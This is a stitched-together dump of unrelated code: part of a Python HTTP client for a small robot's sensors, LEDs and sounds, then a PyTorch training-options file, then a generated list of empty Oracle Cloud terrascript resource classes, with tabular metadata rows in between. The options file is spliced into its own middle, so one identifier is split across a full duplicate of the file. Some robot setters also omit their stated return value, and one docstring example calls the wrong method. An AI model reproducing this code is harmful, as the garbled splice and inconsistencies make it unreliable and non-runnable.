@@return: 1 if button is pressed, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_button_right()
0
"""
try:
response, content = self.__http.request(self.__rootUrl+"button.right")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_mic_intensity(self):
"""Get value of mic.
This returns the intensity of mic.
@return: Between 0 and 255: the intensit;. -1 in case of error
@rtype: int
@note: \n
>>> t.get_mic_intensity()
129
"""
try:
response, content = self.__http.request(self.__rootUrl+"mic.intensity")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_temperature(self):
"""Get value of temperature.
This returns the temperature of sensor
@return: Temperature in tenths of a degree Celsius; -1 in case of error
@rtype: int
@note: \n
>>> t.get_temperature()
312
"""
try:
response, content = self.__http.request(self.__rootUrl+"temperature")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_rc_last_command(self):
"""Get last rc command received.
@return: Command number (between 0 and 127); -1 in case of error
@rtype: int
@note: \n
>>> t.get_rc_last_command()
80
"""
try:
self.__http.request(self.__rootUrl+"new_rc/0","POST")
response, content = self.__http.request(self.__rootUrl+"rc5.command")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_rc_last_address(self):
"""Get last rc address received.
@return: Address number (between 0 and 31). -1 in case of error
@rtype: int
@note: \n
>>> t.get_rc_last_address()
0
"""
try:
self.__http.request(self.__rootUrl+"new_rc/0","POST")
response, content = self.__http.request(self.__rootUrl+"rc5.address")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def get_rc_new(self):
"""Get if new rc code received.
@return: 1 if new rc code received, 0 otherwise; -1 in case of error
@rtype: int
@note: \n
>>> t.get_temperature()
129
"""
try:
response, content = self.__http.request(self.__rootUrl+"new_rc")
return json.loads(content.decode('utf-8'))[0]
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return -1
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return -1
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return -1
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return -1
def set_sound_system(self,sound):
"""Set a sound system
@param sound: sound to play:
-1: stop playing sound
0: startup sound
1: shutdown sound
2: arrow button sound
3: central button sound
4: free-fall (scary) sound
5: collision sound
6: target ok for friendly behaviour
7: target detect for friendly behaviour
@type sound: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_sound_system(-1)
True
>>> set_sound_system(20)
False
"""
if type(sound)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_sound_system.__doc__)
return False
if sound > 7 or sound < -1:
if self.__debug:
print("Error: params not in range\n"+self.set_sound_system.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventSoundSystem/{0}".format(sound))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_sound_freq(self,freq,ds):
"""Set a sound frequency
@param freq: sound frequency (Hz)
@type freq: float (between 0 and 7812.5)
@param ds: sound duration in 1/60s. Specifying a 0 duration plays the sound continuously and specifying a -1
duration stops the sound.
@type ds: float
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_sound_freq(200, 60)
True
"""
if type(freq)!=float or type(ds)!=float:
if self.__debug:
print("Error: wrong type\n"+self.set_sound_freq.__doc__)
return False
if freq > 7812.5 or freq < 0 or ds < -1:
if self.__debug:
print("Error: params not in range\n"+self.set_sound_freq.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventSoundFreq/{0}/{1}".format(freq,ds))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_top(self,r,g,b):
"""Set color for led on top
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_top(10,0,32)
True
"""
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_top.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_top.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedTop/{0}/{1}/{2}".format(r,g,b))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_bottom_left(self,color):
"""Set color for led on bottom left
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_bottom_left(10,0,32)
True
"""
r = color[0]
g = color[1]
b = color[2]
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_bottom_left.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_bottom_left.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedBotLeft/{0}/{1}/{2}".format(r,g,b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_bottom_right(self, color):
"""Set color for led on bottom right
@param r: value of red (0-32)
@type r: int
@param g: value of green (0-32)
@type g: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_bottom_right(10,0,32)
True
"""
r = color[0]
g = color[1]
b = color[2]
if type(r)!=int or type(g)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_bottom_right.__doc__)
return False
if r > 32 or r < 0 or g > 32 or g < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_bottom_right.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedBotRight/{0}/{1}/{2}".format(r,g,b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_temp(self, color):
"""Set color for temperature led on right
@param r: value of red (0-32)
@type r: int
@param b: value of blue (0-32)
@type b: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_temp(10,32)
True
"""
r = color[0]
b = color[1]
if type(r)!=int or type(b)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_temp.__doc__)
return False
if r > 32 or r < 0 or b > 32 or b < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_temp.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedTemp/{0}/{1}".format(r, b))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_sound(self, r):
"""Set color for sound led on left
@param r: value of red (0-32)
@type r: int
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_sound(20)
True
"""
if type(r)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_sound.__doc__)
return False
if r > 32 or r < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_sound.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedSound/{0}".format(r))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_button(self, leds):
"""Set color for led on top
@param leds: value for leds for each arrow button (forward, right, backward, left)
@type leds: int[4]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_button([0, 32, 0, 32])
True
"""
if len(leds)!=4:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_button.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_button.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_button.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedButton/{0}/{1}/{2}/{3}".format(leds[0], leds[1],
leds[2], leds[3]))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_circle(self, leds):
"""Set color for led circle on top
@param leds: value for leds for each part of circle (clockwise from forward)
@type leds: int[8]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_circle([0, 32, 0, 32, 0, 32, 0, 32])
True
"""
if len(leds)!=8:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_circle.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_circle.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_circle.__doc__)
return False
try:
self.__http.request(self.__rootUrl+"eventLedCircle/{0}/{1}/{2}/{3}/{4}/{5}/{6}/{7}".
format(leds[0], leds[1], leds[2], leds[3], leds[4], leds[5], leds[6], leds[7]))
return True
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_prox_h(self, leds):
"""Set color for leds of horizontal proximity sensors
@param leds: value for leds for each proximity sensor (0-5: front left to right, 6-7 back left to right)
@type leds: int[8]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_prox_h([0, 0, 32, 32, 0, 0, 16, 16])
True
"""
if len(leds)!=8:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_prox_h.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_prox_h.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_prox_h.__doc__)
return False
try:
self.__http.request(self.__rootUrl+"eventLedProxH/{0}/{1}/{2}/{3}/{4}/{5}/{6}/{7}".
format(leds[0], leds[1], leds[2], leds[3], leds[4], leds[5], leds[6], leds[7]))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def set_led_prox_v(self, leds):
"""Set color for leds of vertical proximity sensors
@param leds: value for leds for each proximity sensor (0: left, 1: right)
@type leds: int[2]
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> set_led_prox_v([32, 32])
True
"""
if len(leds)!=2:
if self.__debug:
print("Error: incorrect number of values in array\n"+self.set_led_prox_v.__doc__)
return False
for led in leds:
if type(led)!=int:
if self.__debug:
print("Error: wrong type\n"+self.set_led_prox_v.__doc__)
return False
if led > 32 or led < 0:
if self.__debug:
print("Error: params not in range\n"+self.set_led_prox_v.__doc__)
return False
try:
response, content = self.__http.request(self.__rootUrl+"eventLedProxV/{0}/{1}".format(leds[0], leds[1]))
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
def reset(self):
"""Set motors to 0 and turn off top and bottom leds
@return: True if the method terminated correctly
@rtype: bool
@note: \n
>>> reset()
True
"""
try:
self.__http.request(self.__rootUrl+"eventReset")
except httplib2.ServerNotFoundError:
if self.__debug:
print(self.__errorNotFound)
return False
except ConnectionRefusedError:
if self.__debug:
print(self.__errorConnRefused)
return False
except ConnectionResetError:
if self.__debug:
print(self.__errorConnReset)
return False
except OSError:
if self.__debug:
print(self.__errorNoRoute)
return False
| 31.878354 | 124 | 0.542901 | 3,903 | 35,640 | 4.718678 | 0.074558 | 0.066949 | 0.081229 | 0.118152 | 0.817343 | 0.806646 | 0.796818 | 0.787045 | 0.755118 | 0.730304 | 0 | 0.022869 | 0.370595 | 35,640 | 1,117 | 125 | 31.906893 | 0.798146 | 0.193294 | 0 | 0.827485 | 0 | 0 | 0.067039 | 0.009197 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040936 | false | 0 | 0.002924 | 0 | 0.288012 | 0.19883 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ee1672c9167e9f930c85acbd55a01957a6f03fa8 | 6,486 | py | Python | options.py | sudipansaha/cifarAndSvhnClassification | 8c0780bf4034142cbd657d7f720c60e0006644a6 | [
"BSD-2-Clause"
] | 1 | 2020-06-23T10:07:20.000Z | 2020-06-23T10:07:20.000Z | options.py | sudipansaha/cifarAndSvhnClassification | 8c0780bf4034142cbd657d7f720c60e0006644a6 | [
"BSD-2-Clause"
] | null | null | null | options.py | sudipansaha/cifarAndSvhnClassification | 8c0780bf4034142cbd657d7f720c60e0006644a6 | [
"BSD-2-Clause"
] | null | null | null | """
Code Author: Sudipan Saha.
"""
import torch
import argparse
import os
import numpy as np
class options():
"""This class defines some options/arguments
"""
def __init__(self):
"""Reset the class; indicates the class hasn't been initailized"""
self.initialized = False
def initialize(self, parser):
parser = argparse.Argu"""
Code Author: Sudipan Saha.
"""
import torch
import argparse
import os
import numpy as np
class options():
"""This class defines some options/arguments
"""
def __init__(self):
"""Reset the class; indicates the class hasn't been initailized"""
self.initialized = False
def initialize(self, parser):
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--dataset', default='cifar10', type=str, help='dataset') ##dataset: cifar10/cifar100/svhn
parser.add_argument('--lr', default='0.1', type=str, help='learning rate(s)') ##different learning rates can be passed as comma-separated string like '0.1,0.05'
parser.add_argument('--epochs', default='100', type=str, help='epoch count(s)') ##epochs corr. to different learning rates can be passed as comma-separated string like '100,50'
parser.add_argument('--resume', '-r', action='store_true',
help='resume from checkpoint')
parser.add_argument('--checkpointPath', default='./checkpoint/', help='checkpoint path') ##checkpoint path, where trained model is stored
parser.add_argument('--model', default='vgg16', help='network architecture: vgg16 / vgg19 / mobilenet_v2 / resnet18 / resnet34 / resnet50 / resnet101') ##network architecture
parser.add_argument('--sgdMomentum', default=0.9, type=float, help='momentum for SGD optimizer') ##SGD optimizer momentum
parser.add_argument('--sgdWeightDecay', default=5e-4, type=float, help='weight decay for SGD optimizer') ##SGD optimizer weight decay
parser.add_argument('--trainingBatchSize', default=64, type=int, help='training batch size') ##batch size during training
self.initialized = True
return parser
def parseOptions(self):
"""Parse the options"""
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = self.initialize(parser)
opt = parser.parse_args()
dataset = opt.dataset ##valid values: cifar10/cifar100/svhn/mnist
checkpointPath = opt.checkpointPath ## checkpoint path
if not os.path.exists(checkpointPath):
os.makedirs(checkpointPath) ##Creating checkpoint directory if it does not exist
resumeTrainingBool = opt.resume ##this bool indicates whether training is to be resumed from a checkpoint
learningRates = np.array(opt.lr.split(','),dtype=np.float).tolist() ##learning rates, can be one value or an array
epochs = np.array(opt.epochs.split(','),dtype=np.int).tolist() ##epochs, can be one value or an array
modelName = opt.model ##network architecture
sgdMomentum = opt.sgdMomentum ##SGD optimizer momentum
sgdWeightDecay = opt.sgdWeightDecay ##SGD optimizer weight decay
trainingBatchSize = opt.trainingBatchSize ##Batch size during training
return dataset,checkpointPath,resumeTrainingBool,learningRates,epochs, modelName, sgdMomentum, sgdWeightDecay, trainingBatchSize
mentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--dataset', default='cifar10', type=str, help='dataset') ##dataset: cifar10/cifar100/svhn
parser.add_argument('--lr', default='0.1', type=str, help='learning rate(s)') ##different learning rates can be passed as comma-separated string like '0.1,0.05'
parser.add_argument('--epochs', default='100', type=str, help='epoch count(s)') ##epochs corr. to different learning rates can be passed as comma-separated string like '100,50'
parser.add_argument('--resume', '-r', action='store_true',
help='resume from checkpoint')
parser.add_argument('--checkpointPath', default='./checkpoint/', help='checkpoint path') ##checkpoint path, where trained model is stored
parser.add_argument('--model', default='vgg16', help='network architecture: vgg16 / vgg19 / mobilenet_v2 / resnet18 / resnet34 / resnet50 / resnet101') ##network architecture
parser.add_argument('--sgdMomentum', default=0.9, help='momentum for SGD optimizer') ##SGD optimizer momentum
parser.add_argument('--sgdWeightDecay', default=5e-4, help='weight decay for SGD optimizer') ##SGD optimizer weight decay
parser.add_argument('--trainingBatchSize', default=64, type=int, help='training batch size') ##batch size during training
self.initialized = True
return parser
def parseOptions(self):
"""Parse the options"""
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser = self.initialize(parser)
opt = parser.parse_args()
dataset = opt.dataset ##valid values: cifar10/cifar100/svhn/mnist
checkpointPath = opt.checkpointPath ## checkpoint path
if not os.path.exists(checkpointPath):
os.makedirs(checkpointPath) ##Creating checkpoint directory if it does not exist
resumeTrainingBool = opt.resume ##this bool indicates whether training is to be resumed from a checkpoint
learningRates = np.array(opt.lr.split(','),dtype=np.float).tolist() ##learning rates, can be one value or an array
epochs = np.array(opt.epochs.split(','),dtype=np.int).tolist() ##epochs, can be one value or an array
modelName = opt.model ##network architecture
sgdMomentum = opt.sgdMomentum ##SGD optimizer momentum
sgdWeightDecay = opt.sgdWeightDecay ##SGD optimizer weight decay
trainingBatchSize = opt.trainingBatchSize ##Batch size during training
return dataset,checkpointPath,resumeTrainingBool,learningRates,epochs, modelName, sgdMomentum, sgdWeightDecay, trainingBatchSize
| 48.402985 | 186 | 0.660191 | 721 | 6,486 | 5.891817 | 0.202497 | 0.038136 | 0.072034 | 0.025424 | 0.989171 | 0.989171 | 0.989171 | 0.989171 | 0.989171 | 0.989171 | 0 | 0.02049 | 0.232501 | 6,486 | 133 | 187 | 48.766917 | 0.832865 | 0 | 0 | 0.883117 | 0 | 0 | 0.187254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.103896 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c9f0fb77b0734a1b528dcb26b651a9324dfb7e46 | 34,566 | py | Python | terrascript/resource/hashicorp/oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | terrascript/resource/hashicorp/oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | terrascript/resource/hashicorp/oci.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # terrascript/resource/hashicorp/oci.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:23:14 UTC)
import terrascript
class oci_ai_anomaly_detection_ai_private_endpoint(terrascript.Resource):
pass
class oci_ai_anomaly_detection_data_asset(terrascript.Resource):
pass
class oci_ai_anomaly_detection_model(terrascript.Resource):
pass
class oci_ai_anomaly_detection_project(terrascript.Resource):
pass
class oci_analytics_analytics_instance(terrascript.Resource):
pass
class oci_analytics_analytics_instance_private_access_channel(terrascript.Resource):
pass
class oci_analytics_analytics_instance_vanity_url(terrascript.Resource):
pass
class oci_apigateway_api(terrascript.Resource):
pass
class oci_apigateway_certificate(terrascript.Resource):
pass
class oci_apigateway_deployment(terrascript.Resource):
pass
class oci_apigateway_gateway(terrascript.Resource):
pass
class oci_apm_apm_domain(terrascript.Resource):
pass
class oci_apm_synthetics_monitor(terrascript.Resource):
pass
class oci_apm_synthetics_script(terrascript.Resource):
pass
class oci_artifacts_container_configuration(terrascript.Resource):
pass
class oci_artifacts_container_image_signature(terrascript.Resource):
pass
class oci_artifacts_container_repository(terrascript.Resource):
pass
class oci_artifacts_generic_artifact(terrascript.Resource):
pass
class oci_artifacts_repository(terrascript.Resource):
pass
class oci_audit_configuration(terrascript.Resource):
pass
class oci_autoscaling_auto_scaling_configuration(terrascript.Resource):
pass
class oci_bastion_bastion(terrascript.Resource):
pass
class oci_bastion_session(terrascript.Resource):
pass
class oci_bds_auto_scaling_configuration(terrascript.Resource):
pass
class oci_bds_bds_instance(terrascript.Resource):
pass
class oci_blockchain_blockchain_platform(terrascript.Resource):
pass
class oci_blockchain_osn(terrascript.Resource):
pass
class oci_blockchain_peer(terrascript.Resource):
pass
class oci_budget_alert_rule(terrascript.Resource):
pass
class oci_budget_budget(terrascript.Resource):
pass
class oci_cloud_guard_cloud_guard_configuration(terrascript.Resource):
pass
class oci_cloud_guard_data_mask_rule(terrascript.Resource):
pass
class oci_cloud_guard_detector_recipe(terrascript.Resource):
pass
class oci_cloud_guard_managed_list(terrascript.Resource):
pass
class oci_cloud_guard_responder_recipe(terrascript.Resource):
pass
class oci_cloud_guard_target(terrascript.Resource):
pass
class oci_containerengine_cluster(terrascript.Resource):
pass
class oci_containerengine_node_pool(terrascript.Resource):
pass
class oci_core_app_catalog_listing_resource_version_agreement(terrascript.Resource):
pass
class oci_core_app_catalog_subscription(terrascript.Resource):
pass
class oci_core_boot_volume(terrascript.Resource):
pass
class oci_core_boot_volume_backup(terrascript.Resource):
pass
class oci_core_cluster_network(terrascript.Resource):
pass
class oci_core_compute_capacity_reservation(terrascript.Resource):
pass
class oci_core_compute_image_capability_schema(terrascript.Resource):
pass
class oci_core_console_history(terrascript.Resource):
pass
class oci_core_cpe(terrascript.Resource):
pass
class oci_core_cross_connect(terrascript.Resource):
pass
class oci_core_cross_connect_group(terrascript.Resource):
pass
class oci_core_dedicated_vm_host(terrascript.Resource):
pass
class oci_core_default_dhcp_options(terrascript.Resource):
pass
class oci_core_default_route_table(terrascript.Resource):
pass
class oci_core_default_security_list(terrascript.Resource):
pass
class oci_core_dhcp_options(terrascript.Resource):
pass
class oci_core_drg(terrascript.Resource):
pass
class oci_core_drg_attachment(terrascript.Resource):
pass
class oci_core_drg_attachment_management(terrascript.Resource):
pass
class oci_core_drg_attachments_list(terrascript.Resource):
pass
class oci_core_drg_route_distribution(terrascript.Resource):
pass
class oci_core_drg_route_distribution_statement(terrascript.Resource):
pass
class oci_core_drg_route_table(terrascript.Resource):
pass
class oci_core_drg_route_table_route_rule(terrascript.Resource):
pass
class oci_core_image(terrascript.Resource):
pass
class oci_core_instance(terrascript.Resource):
pass
class oci_core_instance_configuration(terrascript.Resource):
pass
class oci_core_instance_console_connection(terrascript.Resource):
pass
class oci_core_instance_pool(terrascript.Resource):
pass
class oci_core_instance_pool_instance(terrascript.Resource):
pass
class oci_core_internet_gateway(terrascript.Resource):
pass
class oci_core_ipsec(terrascript.Resource):
pass
class oci_core_ipsec_connection_tunnel_management(terrascript.Resource):
pass
class oci_core_ipv6(terrascript.Resource):
pass
class oci_core_listing_resource_version_agreement(terrascript.Resource):
pass
class oci_core_local_peering_gateway(terrascript.Resource):
pass
class oci_core_nat_gateway(terrascript.Resource):
pass
class oci_core_network_security_group(terrascript.Resource):
pass
class oci_core_network_security_group_security_rule(terrascript.Resource):
pass
class oci_core_private_ip(terrascript.Resource):
pass
class oci_core_public_ip(terrascript.Resource):
pass
class oci_core_public_ip_pool(terrascript.Resource):
pass
class oci_core_public_ip_pool_capacity(terrascript.Resource):
pass
class oci_core_remote_peering_connection(terrascript.Resource):
pass
class oci_core_route_table(terrascript.Resource):
pass
class oci_core_route_table_attachment(terrascript.Resource):
pass
class oci_core_security_list(terrascript.Resource):
pass
class oci_core_service_gateway(terrascript.Resource):
pass
class oci_core_shape_management(terrascript.Resource):
pass
class oci_core_subnet(terrascript.Resource):
pass
class oci_core_vcn(terrascript.Resource):
pass
class oci_core_virtual_circuit(terrascript.Resource):
pass
class oci_core_virtual_network(terrascript.Resource):
pass
class oci_core_vlan(terrascript.Resource):
pass
class oci_core_vnic_attachment(terrascript.Resource):
pass
class oci_core_volume(terrascript.Resource):
pass
class oci_core_volume_attachment(terrascript.Resource):
pass
class oci_core_volume_backup(terrascript.Resource):
pass
class oci_core_volume_backup_policy(terrascript.Resource):
pass
class oci_core_volume_backup_policy_assignment(terrascript.Resource):
pass
class oci_core_volume_group(terrascript.Resource):
pass
class oci_core_volume_group_backup(terrascript.Resource):
pass
class oci_data_safe_data_safe_configuration(terrascript.Resource):
pass
class oci_data_safe_data_safe_private_endpoint(terrascript.Resource):
pass
class oci_data_safe_on_prem_connector(terrascript.Resource):
pass
class oci_data_safe_target_database(terrascript.Resource):
pass
class oci_database_autonomous_container_database(terrascript.Resource):
pass
class oci_database_autonomous_container_database_dataguard_association_operation(
terrascript.Resource
):
pass
class oci_database_autonomous_database(terrascript.Resource):
pass
class oci_database_autonomous_database_backup(terrascript.Resource):
pass
class oci_database_autonomous_database_instance_wallet_management(terrascript.Resource):
pass
class oci_database_autonomous_database_regional_wallet_management(terrascript.Resource):
pass
class oci_database_autonomous_database_wallet(terrascript.Resource):
pass
class oci_database_autonomous_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_autonomous_vm_cluster(terrascript.Resource):
pass
class oci_database_backup(terrascript.Resource):
pass
class oci_database_backup_destination(terrascript.Resource):
pass
class oci_database_cloud_database_management(terrascript.Resource):
pass
class oci_database_cloud_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_cloud_vm_cluster(terrascript.Resource):
pass
class oci_database_data_guard_association(terrascript.Resource):
pass
class oci_database_database(terrascript.Resource):
pass
class oci_database_database_software_image(terrascript.Resource):
pass
class oci_database_database_upgrade(terrascript.Resource):
pass
class oci_database_db_home(terrascript.Resource):
pass
class oci_database_db_node_console_connection(terrascript.Resource):
pass
class oci_database_db_system(terrascript.Resource):
pass
class oci_database_exadata_infrastructure(terrascript.Resource):
pass
class oci_database_exadata_infrastructure_storage(terrascript.Resource):
pass
class oci_database_exadata_iorm_config(terrascript.Resource):
pass
class oci_database_external_container_database(terrascript.Resource):
pass
class oci_database_external_container_database_management(terrascript.Resource):
pass
class oci_database_external_database_connector(terrascript.Resource):
pass
class oci_database_external_non_container_database(terrascript.Resource):
pass
class oci_database_external_non_container_database_management(terrascript.Resource):
pass
class oci_database_external_non_container_database_operations_insights_management(
terrascript.Resource
):
pass
class oci_database_external_pluggable_database(terrascript.Resource):
pass
